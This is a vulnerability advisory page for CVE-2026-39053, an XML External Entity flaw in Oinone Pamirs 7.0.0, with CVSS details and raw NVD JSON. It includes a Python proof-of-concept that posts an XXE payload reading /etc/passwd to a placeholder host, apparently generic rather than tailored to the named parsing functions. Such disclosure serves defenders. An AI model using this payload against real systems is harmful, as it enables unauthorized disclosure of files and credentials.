Security Vulnerability Report
CVE-2026-39053 CVSS 6.5 MEDIUM

CVE-2026-39053

Published: 2026-05-15 15:16:52
Last Modified: 2026-05-15 21:16:36

Description

Oinone Pamirs 7.0.0 contains an XML External Entity (XXE) issue in its XStream-based XML parsing logic. When attacker-controlled XML is passed to framework parsing entry points such as PamirsXmlUtils.fromXML(...) or ViewXmlUtils.fromXML(...), unsafe XML processing can lead to file disclosure or SSRF.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Oinone Pamirs 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (example placeholder, not a real host)
target_url = "http://vulnerable-host:8080/api/process"

# XXE payload: the DOCTYPE declares an external entity that the
# unsafe parser expands, disclosing the referenced file in the response
xxe_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
<name>&xxe;</name>
</root>"""

headers = {"Content-Type": "application/xml"}

try:
    response = requests.post(target_url, data=xxe_payload, headers=headers)
    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-39053", "sourceIdentifier": "[email protected]", "published": "2026-05-15T15:16:51.613", "lastModified": "2026-05-15T21:16:35.503", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Oinone Pamirs 7.0.0 contains an XML External Entity (XXE) issue in its XStream-based XML parsing logic. When attacker-controlled XML is passed to framework parsing entry points such as PamirsXmlUtils.fromXML(...) or ViewXmlUtils.fromXML(...), unsafe XML processing can lead to file disclosure or SSRF."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://gist.github.com/Misakim1/859c3eb9ced699089ee0747dae9bedc1", "source": "[email protected]"}, {"url": "https://github.com/oinone/oinone-pamirs", "source": "[email protected]"}, {"url": "https://www.oinone.top/changelog", "source": "[email protected]"}]}}
```